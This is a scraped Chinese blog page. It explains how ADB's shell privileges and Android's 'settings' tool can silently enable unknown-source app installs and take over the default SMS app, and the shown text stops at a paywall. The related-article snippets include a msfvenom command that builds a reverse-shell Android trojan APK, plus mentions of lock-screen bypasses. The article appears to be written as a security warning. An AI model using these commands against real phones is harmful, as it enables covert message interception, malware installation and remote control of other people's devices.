利用ADB和Settings命令行工具轻松的攻击Android手机

最新推荐文章于 2025-06-03 11:02:21 发布
原创 最新推荐文章于 2025-06-03 11:02:21 发布 · 8k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#android #secure #adb #attack

本文探讨了如何使用ADB和Settings命令行工具对Android设备进行潜在的安全攻击。通过设置路径更改默认短信应用,揭示了手机可能面临的隐私风险。同时,指出互联网公司如何利用ADB进行设备监控,提醒用户注意手机被操控的可能性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

从4.2开始,Android提供了一个命令行工具settings。这个工具用于帮助构造SettingProvider的客户端代理,从而可以方便的进行系统设置项的读取和设置。
 但是这个工具和adb配合起来,将对Android的安全构成极大的威胁。因为通过adb来执行settings时的时候,uid是shell,而shell拥有非常多的特权。

当然,问题的根源在于adb的shell权限太高,毕竟即使没有settings这个工具(或者说没有/system/framework/settings.jar文件),adb用户可以自己构造类似这样的程序/脚本。但是现在Android提供了该工具,这样的安全入侵将变得异常简单。

下面用几个例子来说明当用户开启adb后连接电脑,可能对用户手机造成的安全侵害。
注意1:这里针对Nexus手机的原生Android-5.0而言,不同的手机ROM有不同的设置项。
注意2:请先打开手机adb调试模式,并确保adb命令可以正常执行。

1) 修改是否“允许安装来自Play商店之外的其他来源的应用”。
在手机设置项中禁用该选项,操作路径是“设置”->“安全”->“未知来源”
然后执行如下命令: 
$ adb shell settings put secure install_non_market_apps1
退出设置,再次进入,发现“未知来源”已经启用。这样,第三方恶意应用程序就可能被安装成功。

2) 截取用户短信。
从Android 4.4开始,可以由用户设置默认的短信程序用于接管系统短信的收发。对于安装的第三方短信程序,必须用户手工指定才能工作。而利用这个漏洞,adb可以直接指定第三方短信应用程序而无须用户的确认。

在手机设置项中查看短信程序,操作路径是“设置”->“更多”->“默认短信应用”,如果没有修改过,应该是“环聊”。

比如先安装一个短信应用:GoSMSpro。
然后执行如下命令: 

                

        

    

    
  


        

            

                      
                        最低0.47元/天 解锁文章
                        

                          
200万优质内容无限畅学

                          
                        

                      
            

        


    



                



	

		

			

				
					
android手机评测工具,ADB-Toolkit 测试Android设备入侵Android手机工具

				
			

			

				

					weixin_42504214的博客
				

				

					05-27
					
					669
					
				

			

		

		

			
				
ADB-Toolkit是一个BASH脚本,具有28个选项一个METASPLOIT部分,其中有6个选项,可以在Android 设备中轻松进行渗透测试。您可以使用此脚本完成任何事情,并测试您的android设备是否安全。该脚本是在ADB(Android Debug Bridge)的帮助下完成的,它是供开发人员用于调试android设备的工具,但据我们所知,它有好有坏,我没有告诉您做坏事,但不要做违法...

			
		

	



                

            
              



	

		

			

				
					
入侵手机的黑客软件/利用kali nethunter安卓手机adb进行入侵安卓手机测试_详细白帽子入门教程

				
			

			

				

					2401_84915584的博客
				

				

					07-10
					
					2207
					
				

			

		

		

			
				
什么是adb工具adb工具Android Debug Bridge(安卓调试桥)tools。它就是一个命令行窗口,用于通过电脑端与模拟器或者真实设备交互。

			
		

	



              


  
              

                


	

		

			

				
					
Android --- adb shell setprop 是设置系统属性的adb shell settings put 也是设置系统属性的,有什么区别,在项目中体现。

					
最新发布

				
			

			

				

					 梁同学与Android
				

				

					06-03
					
					1000
					
				

			

		

		

			
				
Android --- adb shell setprop 是设置系统属性的adb shell settings put 也是设置系统属性的,有什么区别,在项目中体现。

			
		

	





	

		

			

				
					
adb setting设置

				
			

			

				

					Dijkstra的专栏
				

				

					12-17
					
					1004
					
				

			

		

		

			
				
com.android.settings.DateTimeSettingsSetupWizard 日期时间设置。com.android.settings.PhysicalKeyboardSettings 设置键盘。com.android.settings.DevelopmentSettings 开发者设置。com.android.settings.LanguageSettings 语言键盘设置。com.android.settings.WirelessSettings 无线网络设置。

			
		

	



		

			
		



	

		

			

				
					
打开系统设置界面

				
			

			

				

					wodeyue625的博客
				

				

					08-09
					
					1787
					
				

			

		

		

			
				
com.android.settings.AccessibilitySettings 辅助功能设置

com.android.settings.ActivityPicker 选择活动

com.android.settings.ApnSettings APN设置

com.android.settings.ApplicationSettings 应用程序设置

com.androi

			
		

	





	

		

			

				
					
adb操作SettingsProvider数据库

				
			

			

				

					ITPlus的博客
				

				

					06-07
					
					403
					
				

			

		

		

			
				
adb 

			
		

	





	

		

			

				
					
我的Google系列Android手机无法联网,应该如何使用ADB工具命令行进行故障排查解决?

				
			

			

				

					10-30
				

			

		

		

			
				
当遇到Google系列Android手机无法联网的问题时,可以通过以下步骤使用ADB工具命令行进行故障排查解决。首先,请确保已经正确安装了ADB驱动,并且手机已经通过USB连接到了电脑。其次,开启手机的开发者选项USB...

			
		

	





	

		

			

				
					
adb_华为手机开启关闭系统更新提示.rar

				
			

			

				

					05-08
				

			

		

		

			
				
标题中的“adb_华为手机开启关闭系统更新提示.rar”表明了这个压缩包包含的教程是关于使用ADB工具来管理华为手机系统更新提示的。ADBAndroid Debug Bridge)是谷歌提供的一个开发者工具,用于与Android设备进行...

			
		

	





	

		

			

				
					
使用ADB工具轻松解锁手机屏幕

				
			

			

				

					
				

			

		

		

			
				
adb是一个多功能命令行工具,它允许用户与安卓设备进行通信。通过使用adb工具,可以在不需要重启手机进入recovery模式的情况下,绕过锁屏密码。这无疑为用户带来了一个更为安全便捷的选择,尤其在你想要访问设备而...

			
		

	





	

		

			

				
					
ADB命令控制安卓手机(虚拟按键、状态栏)显示隐藏,或者直接禁用。

				
			

			

				

					04-15
				

			

		

		

			
				
ADBAndroid Debug Bridge)是Android系统提供的一种命令行工具,用于连接电脑与安卓设备进行通信。这个工具在开发者高级用户中广泛应用,因为它允许执行各种操作,如安装应用、调试应用、传输文件以及控制设备的...

			
		

	





	

		

			

				
					
adb shell settings高级指令设置系统属性所有的指令汇总+注释

				
			

			

				

					weixin_45623536的博客
				

				

					02-06
					
					3571
					
				

			

		

		

			
				
adb shell settings高级指令设置系统属性所有的指令汇总+注释

			
		

	





	

		

			

				
					
adb查看修改settings

				
			

			

				

					IOsetting的专栏
				

				

					08-21
					
					2891
					
				

			

		

		

			
				
初始化命令
对应USB连接的安卓设备

# 用help查看版本,位置参数
>adb --help
Android Debug Bridge version 1.0.41
Version 30.0.4-6686687
Installed as C:\Users\username\AppData\Local\Android\Sdk\platform-tools\adb.exe
...

# ...

			
		

	





	

		

			

				
					
Android 打开设置的各个页面

				
			

			

				

					qq_28641023的博客
				

				

					11-15
					
					1805
					
				

			

		

		

			
				
欢迎使用Markdown编辑器写博客本Markdown编辑器使用StackEdit修改而来,用它写博客,将会带来全新的体验哦:
Markdown扩展Markdown简洁的语法
代码块高亮
图片链接图片上传
LaTex数学公式
UML序列图流程图
离线写博客
导入导出Markdown文件
丰富的快捷键
快捷键
加粗    Ctrl + B 
斜体    Ctrl + I 
引用    Ctrl

			
		

	





	

		

			

				
					
android 进入adb总结

				
			

			

				

					weixin_34326179的博客
				

				

					04-06
					
					523
					
				

			

		

		

			
				
1.打开Terminal
2.输入
e:
复制代码3.输入
cd E:\Users\Administrator\AppData\Local\Android\Sdk\platform-tools
复制代码4.输入adb命令例如:
adb get-state
复制代码5.(有时候是没打到断点,不是无法调试)

转载于:https://juejin.im/post/5ca8a852f265da30790...

			
		

	





	

		

			

				
					
Android应用安全之ADB攻击

				
			

			

				

					itheimach的专栏
				

				

					02-08
					
					1342
					
				

			

		

		

			
				
ADB启动四大组件通过adb shell命令可以启动跳转activity,启动service,或者发送广播broadcast等!通过该方式(与隐式启动类似)启动对于有传值的组件,不传值或者不对应传值可能造成我们的应用崩溃,或者出现错误信息,有可能产生严重的后果!在我们的程序中需要避免!启动命令发送广播,action为xxxx
am broadcast -a xxxx传递int,string值
am

			
		

	





	

		

			

				
					
kali linux入侵安卓7.0,【教程】metasploit入侵安卓手机

				
			

			

				

					weixin_29232507的博客
				

				

					05-13
					
					6736
					
				

			

		

		

			
				
metasploit入侵安卓手机shellKALI IP: 192.168.194.1281.生成木马文件msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.194.128 LPORT=5555 R > /root/ma.apk// LHOST = KALI IP 。LPORT = 接收的端口 。 /root/ma.apk...

			
		

	





	

		

			

				
					
执行adb disable-verity提示:Device is locked. Please unlock the device first

					
热门推荐

				
			

			

				

					hanhan1016的专栏
				

				

					05-06
					
					2万+
					
				

			

		

		

			
				
有时候需要push应用或是so文件到system目录下,这时候就需要执行adb remount,但是有时候会提示:
remount of the / superblock failed: Permission denied
remount failed
这时可以通过执行adb disable-verity来解决,正常情况下,执行adb disable-verity成功后会提示:
Successfu...

			
		

	





	

		

			

				
					
android绕过设备锁(device lock)

				
			

			

				

					老王的智能终端安全专栏
				

				

					12-02
					
					1万+
					
				

			

		

		

			
				
先准备素材,然后展开编写。听说这几天爆了一个device lock的漏洞。
http://we.droidiser.com/viewtopic.php?f=21&t=29
http://en.miui.com/thread-5684-1-1.html
http://oscarmini.com/2013/09/locked-out-how-to-bypass-pattern-lock-on-a

			
		

	





	

		

			

				
					
adb常用实用命令

				
			

			

				

					guangdeshishe的博客
				

				

					05-13
					
					2371
					
				

			

		

		

			
				
adb shell pm hide xxx包名: 隐藏某个app,相当于禁用,无需root权限,不需要修改"Read-only"状态,不删除app数据
adb shell pm unhide xxx包名:取消隐藏app
adb shell pm clear xxx包名:清除app数据
adb shell pm path xxx包名:查找app安装包所在路径
adb shell pm list packages xxx关键字:通过关键字查找相关包名


...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		
评论 1

	

  
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值